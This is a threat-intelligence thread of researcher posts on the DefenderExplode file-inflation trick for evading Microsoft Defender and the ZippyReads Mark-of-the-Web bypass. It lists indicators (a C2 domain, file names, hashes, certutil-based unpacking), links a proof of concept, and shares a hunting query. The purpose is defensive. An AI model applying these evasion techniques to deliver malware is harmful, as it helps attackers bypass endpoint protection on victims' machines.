@GossiTheDog
Any custom detections you can share atm? Or will your #DefenderExplode detection already cover this?
Saw a #DefenderExplode (large file size to evade MS Defender) used to deliver #Ducktail trojan - Defender for Endpoint miss.
At first it looked like a really lame malware, but it's interesting - it uses a legit copy of PHP and the malware is all written in PHP. Your AV doesn't trigger on legit php.exe
Here's a prior write up:
https://www.zscaler.com/blogs/security-research/new-php-variant-ducktail-infostealer-targeting-facebook-business-accounts
Another #zippyreads with #defenderexplode, Defender miss. https://www.virustotal.com/gui/search/8ff4a018d35c2c0f127784601b53048c83a541e20789fc7399ea0f645a0e50fa
A bit of #threatintel - MSTIC are tracking DEV-0408 using #ZippyReads and #DefenderExplode (well, they should be, they might not realise it but they’re tracking same actors).
#threatintel #zippyreads #defenderexplode
@buffaloverflow Rich strikes again :O #DefenderExplode and #ZippyReads PoC, if anybody wants to have a play.
- Adds the read only flag on file in ZIP to bypass MOTW without November OS patches.
- Inflates file size on unzip, to evade logging in telemetry/detection.
https://gist.github.com/rxwx/8299693ac9f3f7118dc813da29e4d782
@dasgrog Defender for Endpoint should pick things up in EDR (that said.. I haven't tested with this one - and we've had complete Defender for Endpoint misses on #DefenderExplode before, where not a single alert triggered).
UK energy supply trojan #threatintel
#Octopus Energy themed trojan using #ZippyReads MOTW bypass and #DefenderExplode Defender AV telemetry bypass
Riffing off UK energy supply issues
IoCs
C2 docusign-octopus-energy.com
Filename OctopusEnergyS.pdf..lnk
Hash 7ff60dd9d6b5de8f5235d4d3975d8fcfbc96ceaec9aafb9ab9bd40f192490ff9
Size 300mb
Filename %AppData%\Local\Temp\.hta
Writes self using certutil decode.
Trojan DLL, 323mb:
\AppData\Local\Temp\x.dll
#threatintel #octopus #zippyreads #defenderexplode
Regarding #DefenderExplode - making a small ZIP file that explodes in size to >100mb and breaks Defender AV detection/telemetry - does anybody know what attackers are using to build? I see them using large .lnk files for infostealers still, been going on for months.
Either that or could somebody build a PoC that does the same thing? I'm wondering if they're using something like ZipBomb (https://www.bamsoftware.com/hacks/zipbomb/)
As found by @buffaloverflow, #ZippyReads and #DefenderExplode have been used in the wild since early October. Might write a blog on the Defender issue later as this stuff is just sailing through MS suite still. https://infosec.exchange/@buffaloverflow/109393786384764390
Here’s what #DefenderExplode looks like in MS Defender telemetry, they’re missing file hashes and detection.
Written a Defender advanced hunting query for #DefenderExplode with .lnk files
https://github.com/GossiTheDog/ThreatHunting/blob/master/AdvancedHuntingQueries/DefenderExplode.ahq
If you run this one in Defender for Endpoint, AV misses and EDR logs it with zero file hash value (including in their own telemetry) - that one is #DefenderExplode, I have told MS about it, it's being used by infostealer groups.
Great #malware sample caught by @k3dg3 #threatintel
Exploits #ZippyReads (read only file for bypass of Mark-of-the-Web) and #DefenderExplode, a large file zero day in Microsoft Defender AV which breaks their telemetry and detection.
Targets Italy. Calls michaelpagerecruitment-ukoffers.]com
https://www.virustotal.com/gui/file/13846a9778f224ae692edddcc90746d0e619f872733c2c880188c36797b2c4e7
#malware #threatintel #zippyreads #defenderexplode